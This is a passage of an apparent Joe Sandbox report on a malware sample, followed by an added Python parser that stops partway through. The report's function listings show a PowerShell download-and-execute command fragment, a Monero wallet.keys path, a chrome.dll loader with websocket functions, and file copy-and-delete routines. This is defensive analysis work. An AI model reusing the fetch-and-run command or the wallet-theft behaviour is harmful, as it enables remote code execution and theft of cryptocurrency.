                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00AD2F54
                                      • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00AD2F14
                                      • <, xrefs: 00AD2F89
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                      • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      • API String ID: 3031569214-898575020
                                      • Opcode ID: ce27a64999837dd97a0428cb6cda12c512eb63ba67a180f40b513a6eb98ba69e
                                      • Instruction ID: 790e73ce84c00467fe2a066c85f18de1370d5abf8cd82f38c7bf2afaefc1c46c
                                      • Opcode Fuzzy Hash: ce27a64999837dd97a0428cb6cda12c512eb63ba67a180f40b513a6eb98ba69e
                                      • Instruction Fuzzy Hash: A341DD719102089BDB14EFA0C9A2FEDBB79AF24300F40455BE05766296EF746A4ACF91
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: dllmain_raw$dllmain_crt_dispatch
                                      • String ID:
                                      • API String ID: 3136044242-0
                                      • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                      • Instruction ID: 33fbaf84c2cbb6d18e6f8bd2a846eca8d177dcb292c15ecdb2cbd530fc27f9e9
                                      • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                      • Instruction Fuzzy Hash: 47218172D40628ABDB229EA9CC45AAF7EF9EB81790FA55195F80D77211D3308D418BE0
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AD7FC7
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00AD7FCE
                                      • RegOpenKeyExA.ADVAPI32(80000002,0153B7D0,00000000,00020119,?), ref: 00AD7FEE
                                      • RegQueryValueExA.ADVAPI32(?,0154E168,00000000,00000000,000000FF,000000FF), ref: 00AD800F
                                      • RegCloseKey.ADVAPI32(?), ref: 00AD8022
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      • Opcode ID: e9975ea01562adc392dce19ba171250c66d538d3ab2fc2cb89958d4ce5437469
                                      • Instruction ID: 0d6ef9a087eeee37de136b59db8cf84887cd06a8010e9972e7194d52e97fcec4
                                      • Opcode Fuzzy Hash: e9975ea01562adc392dce19ba171250c66d538d3ab2fc2cb89958d4ce5437469
                                      • Instruction Fuzzy Hash: B2114CB1A54309ABD704CB94DD45FABBBB8FB44B10F10421AF616E7380DBB959008BA1
                                      APIs
                                      • StrStrA.SHLWAPI(0154F4B8,00000000,00000000,?,00AC9F71,00000000,0154F4B8,00000000), ref: 00AD93FC
                                      • lstrcpyn.KERNEL32(00D97580,0154F4B8,0154F4B8,?,00AC9F71,00000000,0154F4B8), ref: 00AD9420
                                      • lstrlen.KERNEL32(00000000,?,00AC9F71,00000000,0154F4B8), ref: 00AD9437
                                      • wsprintfA.USER32 ref: 00AD9457
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpynlstrlenwsprintf
                                      • String ID: %s%s
                                      • API String ID: 1206339513-3252725368
                                      • Opcode ID: 498b8b7bcdedb645ae5b2874eaba9070d1e4f45e96b1fc1a85b58e5432d3aa29
                                      • Instruction ID: 9fcb9c5a1096cb6ada5cd4ed91e4ea8cb91b4f88f41bff75a771eb5248b634e8
                                      • Opcode Fuzzy Hash: 498b8b7bcdedb645ae5b2874eaba9070d1e4f45e96b1fc1a85b58e5432d3aa29
                                      • Instruction Fuzzy Hash: 3901C875614208FFCB44DFA8C948EEE7BB8EB48304F108649F9099B345D631EA44DBA4
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AC12B4
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00AC12BB
                                      • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00AC12D7
                                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00AC12F5
                                      • RegCloseKey.ADVAPI32(?), ref: 00AC12FF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      • Opcode ID: 5ec944214b287789f7d90642c8d8d4f8d6706539868c632e70e1d4d0d3258a71
                                      • Instruction ID: b9fe2c5c707d6c96cf03becad84cbbc2e0c79e3c66d30fcf0c5f555d57b99de1
                                      • Opcode Fuzzy Hash: 5ec944214b287789f7d90642c8d8d4f8d6706539868c632e70e1d4d0d3258a71
                                      • Instruction Fuzzy Hash: C101CD79A54309BBDB04DFD4DC49FAE7778AB48701F10419AFA05E7290D6709A008BA4
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00AD6903
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00AD69C6
                                      • ExitProcess.KERNEL32 ref: 00AD69F5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                      • String ID: <
                                      • API String ID: 1148417306-4251816714
                                      • Opcode ID: 202a52228949ad038e4e2d1b1509b45a498c1c76a885cdc5fae5338c4bf0cc5e
                                      • Instruction ID: 156c54e7db35f280e997c63cdd83f57c2731646685445c499dbcbedd59a8b921
                                      • Opcode Fuzzy Hash: 202a52228949ad038e4e2d1b1509b45a498c1c76a885cdc5fae5338c4bf0cc5e
                                      • Instruction Fuzzy Hash: F7312FB1911218ABDB14EB90DE95FDDB778AF14300F40418BF206B6291DF746B48CF69
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00AE0E10,00000000,?), ref: 00AD89BF
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00AD89C6
                                      • wsprintfA.USER32 ref: 00AD89E0
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                       • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateProcesslstrcpywsprintf
                                      • String ID: %dx%d
                                      • API String ID: 1695172769-2206825331
                                      • Opcode ID: d08c3f630248e9e261c7ffdaed53d578e19d1f5be8893a98247165e93e571158
                                      • Instruction ID: 913c4222ab1a8aedfb4b0082b44f695ebeb1471cb3fc2b2120c0ef774094ddb8
                                      • Opcode Fuzzy Hash: d08c3f630248e9e261c7ffdaed53d578e19d1f5be8893a98247165e93e571158
                                      • Instruction Fuzzy Hash: 052108B1A54304AFDB00DF94DD45FAEBBB8FB48B10F10465AFA16E7390C775A9008BA4
                                      APIs
                                      • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00ACA098
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                       • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                      • API String ID: 1029625771-1545816527
                                      • Opcode ID: 0262aa93ed377be46639a8d2ab13d88821a6436f954307dd1cf38b889b2767d3
                                      • Instruction ID: 689639df4dda9bbbdf55931a1b2a614b424eb60848fe47a8a0d81f81810b7249
                                      • Opcode Fuzzy Hash: 0262aa93ed377be46639a8d2ab13d88821a6436f954307dd1cf38b889b2767d3
                                      • Instruction Fuzzy Hash: 2AF01774AAC308EFD714ABA0EC4DB663374A319354F84092AE50DD73A0D7B49884CB76
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00AD96AE,00000000), ref: 00AD8EEB
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00AD8EF2
                                      • wsprintfW.USER32 ref: 00AD8F08
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                       • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateProcesswsprintf
                                      • String ID: %hs
                                      • API String ID: 769748085-2783943728
                                      • Opcode ID: 0794fd87307f069d48dc47d6d9aa51759e8100f330a21068af530f777e50771b
                                      • Instruction ID: eaf1747e42fd32274b29497b165a9563552afd576b6bba876f07990be81e6a78
                                      • Opcode Fuzzy Hash: 0794fd87307f069d48dc47d6d9aa51759e8100f330a21068af530f777e50771b
                                      • Instruction Fuzzy Hash: E4E0EC75A68309BBDB10DB94DD0AE6D77B8EB05701F000196FD09D7340DA719E109BA5
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                        • Part of subcall function 00AD8CF0: GetSystemTime.KERNEL32(00AE0E1B,0154E890,00AE05B6,?,?,00AC13F9,?,0000001A,00AE0E1B,00000000,?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00AD8D16
                                        • Part of subcall function 00ADAC30: lstrcpy.KERNEL32(00000000,?), ref: 00ADAC82
                                        • Part of subcall function 00ADAC30: lstrcat.KERNEL32(00000000), ref: 00ADAC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00ACAA11
                                      • lstrlen.KERNEL32(00000000,00000000), ref: 00ACAB2F
                                      • lstrlen.KERNEL32(00000000), ref: 00ACADEC
                                        • Part of subcall function 00ADAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00ADAAF6
                                      • DeleteFileA.KERNEL32(00000000), ref: 00ACAE73
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                       • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: 48e65a25a42b2f1cec7538249d7e61ffb0038944c3eb03e24200ee31a7420b89
                                      • Instruction ID: 29acdae58e35457f16f44eb684deb48204086ff889dcd10f91a3d55c63b8e929
                                      • Opcode Fuzzy Hash: 48e65a25a42b2f1cec7538249d7e61ffb0038944c3eb03e24200ee31a7420b89
                                      • Instruction Fuzzy Hash: F4E1BF729101189BCB05EBA4DEA6EEE7339AF24300F50855BF15776291EF306E49CB72
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                        • Part of subcall function 00AD8CF0: GetSystemTime.KERNEL32(00AE0E1B,0154E890,00AE05B6,?,?,00AC13F9,?,0000001A,00AE0E1B,00000000,?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00AD8D16
                                        • Part of subcall function 00ADAC30: lstrcpy.KERNEL32(00000000,?), ref: 00ADAC82
                                        • Part of subcall function 00ADAC30: lstrcat.KERNEL32(00000000), ref: 00ADAC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00ACD581
                                      • lstrlen.KERNEL32(00000000), ref: 00ACD798
                                      • lstrlen.KERNEL32(00000000), ref: 00ACD7AC
                                      • DeleteFileA.KERNEL32(00000000), ref: 00ACD82B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                       • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: 4ababfe1186ced65b2f4fb83b0366b5c6ff0d186a8bb0c455d6f5c2eb10d4d3c
                                      • Instruction ID: 05a3b4d01fa7e68e47d2e8c354eb5a6e1c0984ef152e0f47f6feb6950e7061c1
                                      • Opcode Fuzzy Hash: 4ababfe1186ced65b2f4fb83b0366b5c6ff0d186a8bb0c455d6f5c2eb10d4d3c
                                      • Instruction Fuzzy Hash: 0291D1729101189BCB04FBA4DEA6EEE7339AF64300F50456BF15776291EF306A49CB72
                                      APIs
                                        • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
                                        • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
                                        • Part of subcall function 00ADACC0: lstrcpy.KERNEL32(00000000), ref: 00ADAD14
                                        • Part of subcall function 00ADACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00ADAD22
                                        • Part of subcall function 00ADABB0: lstrcpy.KERNEL32(?,00AE0E1A), ref: 00ADAC15
                                        • Part of subcall function 00AD8CF0: GetSystemTime.KERNEL32(00AE0E1B,0154E890,00AE05B6,?,?,00AC13F9,?,0000001A,00AE0E1B,00000000,?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00AD8D16
                                        • Part of subcall function 00ADAC30: lstrcpy.KERNEL32(00000000,?), ref: 00ADAC82
                                        • Part of subcall function 00ADAC30: lstrcat.KERNEL32(00000000), ref: 00ADAC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00ACD901
                                      • lstrlen.KERNEL32(00000000), ref: 00ACDA9F
                                      • lstrlen.KERNEL32(00000000), ref: 00ACDAB3
                                      • DeleteFileA.KERNEL32(00000000), ref: 00ACDB32
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                       • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: 04bd931753a4f1893858dc334313bdf2bdfe4cb09f083e827d7af8a7fd90e867
                                      • Instruction ID: e48107711794e5e832b3adf3009f7d4daa690e44f6900ca4d3d989401071e534
                                      • Opcode Fuzzy Hash: 04bd931753a4f1893858dc334313bdf2bdfe4cb09f083e827d7af8a7fd90e867
                                      • Instruction Fuzzy Hash: C181E5729201189BCB04FBA4DE66EEE7339AF64300F40455BF557A6291EF346E09CB72
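The function blocks above are the raw output of the sandbox's code analysis: one routine loads C:\ProgramData\chrome.dll with LoadLibraryA and carries the names connect_to_websocket and free_result in its String ID, and three near-identical routines CopyFileA a target (the \Monero\wallet.keys path appears in their lstrlen subcall), measure the result with lstrlen and then DeleteFileA it. The Python script below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses blocks in this page's format into per-function call chains, pulls the string indicators out of the arguments and String ID fields, and tags the two behaviours. SAMPLE is an excerpt copied verbatim from the blocks above; the tag names and the classification heuristics are my own assumptions for illustration.

```python
"""Parse Joe Sandbox 'APIs' function blocks into call chains and indicators.

Added example, not part of the report or the analysed sample. SAMPLE is an
excerpt copied from this report's own function blocks; the tag names and the
classification heuristics below are assumptions made for illustration.
"""
import re
from dataclasses import dataclass, field

# Constructed input: verbatim lines from two of the report's function blocks.
SAMPLE = r"""
APIs
• LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00ACA098
Strings
Similarity
• API ID: LibraryLoad
• String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
• API String ID: 1029625771-1545816527
APIs
  • Part of subcall function 00ADAA50: lstrcpy.KERNEL32(00AE0E1A,00000000), ref: 00ADAA98
  • Part of subcall function 00ADACC0: lstrlen.KERNEL32(?,01548C58,?,\Monero\wallet.keys,00AE0E1A), ref: 00ADACD5
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00ACAA11
• lstrlen.KERNEL32(00000000,00000000), ref: 00ACAB2F
• DeleteFileA.KERNEL32(00000000), ref: 00ACAE73
Similarity
• API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
• String ID:
• API String ID: 211194620-0
"""

# One API line: optional "Part of subcall function XXXXXXXX:" prefix, then
# Api.MODULE(args), ref: XXXXXXXX. Some entries (e.g. wsprintfA) have no parens.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
HEX8 = re.compile(r"[0-9A-F]{8}")
ID_FIELDS = {"API ID": "api_id", "String ID": "string_id", "API String ID": "api_string_id"}


@dataclass
class FunctionBlock:
    calls: list = field(default_factory=list)
    api_id: str = ""
    string_id: str = ""
    api_string_id: str = ""

    def direct_chain(self):
        """APIs called by the function itself, in listing order (subcalls excluded)."""
        return [c["api"] for c in self.calls if c["sub"] is None]

    def strings(self):
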